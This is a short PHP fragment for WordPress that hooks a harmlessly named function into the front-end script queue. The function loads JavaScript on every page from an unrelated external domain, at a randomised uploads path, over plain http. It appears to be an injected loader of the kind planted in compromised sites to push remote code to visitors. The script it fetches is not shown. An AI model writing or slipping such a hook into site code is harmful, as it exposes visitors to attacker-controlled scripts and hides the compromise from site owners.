if (!function_exists('sch_enqueue_front_asset')) { function sch_enqueue_front_asset() { wp_enqueue_script('sch-front', 'http://nhatnamco.com/wp-content/uploads/res-dca28f/data-ab33/front-6cdcbcd7.js', array(), null, false); } add_action('wp_enqueue_scripts', 'sch_enqueue_front_asset'); }